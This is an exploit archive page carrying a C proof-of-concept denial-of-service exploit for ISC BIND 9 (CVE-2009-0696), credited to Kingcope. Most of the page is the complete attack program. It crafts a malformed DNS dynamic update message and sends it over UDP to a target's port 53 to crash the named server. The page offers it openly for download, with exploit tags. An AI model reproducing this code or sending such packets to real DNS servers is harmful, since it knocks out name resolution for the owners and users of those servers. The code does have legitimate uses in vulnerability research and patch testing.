exploit the possibilities

ISC BIND 9 Remote Dynamic Update Message Denial Of Service

ISC BIND 9 Remote Dynamic Update Message Denial Of Service
Posted Jul 30, 2009
Authored by Kingcope

ISC BIND 9 remote dynamic update message denial of service proof of concept exploit.

tags | exploit, remote, denial of service, proof of concept
advisories | CVE-2009-0696
MD5 | a61bbabebb2a6b7d45a77e10bf8e5b8e

ISC BIND 9 Remote Dynamic Update Message Denial Of Service

Change Mirror Download
/*
ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
"Based on:
http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt
by kingcope - this is basically a rewrite of the above, lame i know, but fun enough

for the [zone] argument you can try what is in the named.conf with "type master"
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

#define PORT 31337

struct dnspkt1 {
unsigned short transact;
unsigned short flags;
unsigned short zones;
unsigned short pr;
unsigned short updates;
unsigned short rrs;
};

struct dnspkt2 {
unsigned short type;
unsigned short class;
unsigned short name2;
unsigned short type2;
unsigned short class2;
unsigned short ttl1;
unsigned short ttl2;
unsigned short datalen;
unsigned short name3;
unsigned short type3;
unsigned short class3;
unsigned short ttl3;
unsigned short ttl4;
unsigned short datalen2;
};

int packdomain(char * dest, const char *src)
{
int i,n,cnt;

n=strlen(src);
dest[n+1]=0; // terminator

cnt=0;
for (i=n; i>0; i--)
{
if (src[i-1]=='.')
{
dest[i]=cnt;
cnt=0;
}
else
{
dest[i]=src[i-1];
cnt++;
}
}
dest[0]=cnt;
return n+2;
}

int main(int argc, char **argv) {
int sockfd, clilen;
struct sockaddr_in serv_addr, cli_addr;
struct dnspkt1 d1;
struct dnspkt2 d2;

printf("ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC\n");
printf("Based on:\n");
printf("http://www.securityfocus.com/data/vulnerabilities/exploits/35848.txt\n");
printf("by kingcope - this is basically a rewrite of the above, lame i know, but fun tough\n");

if (argc < 2) {
printf("usage: %s <host> [zone]\n", argv[0]);
return 0;
}

sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sockfd < 0) {
printf("error on socket() call");
return -1;
}

memset(&serv_addr, '\0', sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(PORT);

if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0) {
printf("error binding socket\n");
return -1;
}

memset(&cli_addr, '\0', sizeof(cli_addr));
cli_addr.sin_family = AF_INET;
cli_addr.sin_addr.s_addr = inet_addr(argv[1]);
cli_addr.sin_port = htons(53);

memset(&d1, '\0', sizeof(d1));
memset(&d2, '\0', sizeof(d2));
d1.transact = htons(0x1cd6);
d1.flags = htons(0x2800);
d1.zones = htons(0x0001);
d1.pr = htons(0x0001);
d1.updates = htons(0x0001);
d1.rrs = 0;
char *name = (char*)malloc(8096);
char nam[1024];

if (argc < 3) {
/* Not sure if this is right to set as default, have no clue about dns proto
It works for me.. */
strcpy(nam, "127.in-addr.arpa");
} else {
strncpy(nam, argv[2], sizeof(nam));
nam[sizeof(nam)-1]=0;
}

int n=packdomain(name, (char*)nam);
d2.type = htons(0x0006);
d2.class = htons(0x0001);
d2.name2 = htons(0xc00c);
d2.type2 = htons(0x00ff);
d2.class2 = htons(0x0001);
d2.datalen = 0;
d2.name3 = htons(0xc00c);
d2.type3 = htons(0x00ff);
d2.class3 = htons(0x00ff);
d2.ttl1 = 0;
d2.ttl2 = 0;
d2.ttl3 = 0;
d2.ttl4 = 0;
d2.datalen2 = 0;

char buffer[10000];
memcpy(buffer, &d1, sizeof(d1));
memcpy(buffer+sizeof(d1), name, n);
memcpy(buffer+sizeof(d1)+n, &d2, sizeof(d2));

clilen=sizeof(cli_addr);

sendto(sockfd, buffer, sizeof(d1)+sizeof(d2)+n, 0, (struct sockaddr *)&cli_addr, sizeof(cli_addr));
printf("aight!\n");
return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

January 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    8 Files
  • 2
    Jan 2nd
    11 Files
  • 3
    Jan 3rd
    11 Files
  • 4
    Jan 4th
    2 Files
  • 5
    Jan 5th
    2 Files
  • 6
    Jan 6th
    18 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    10 Files
  • 10
    Jan 10th
    13 Files
  • 11
    Jan 11th
    2 Files
  • 12
    Jan 12th
    4 Files
  • 13
    Jan 13th
    21 Files
  • 14
    Jan 14th
    18 Files
  • 15
    Jan 15th
    12 Files
  • 16
    Jan 16th
    18 Files
  • 17
    Jan 17th
    11 Files
  • 18
    Jan 18th
    3 Files
  • 19
    Jan 19th
    2 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    21 Files
  • 22
    Jan 22nd
    19 Files
  • 23
    Jan 23rd
    19 Files
  • 24
    Jan 24th
    11 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close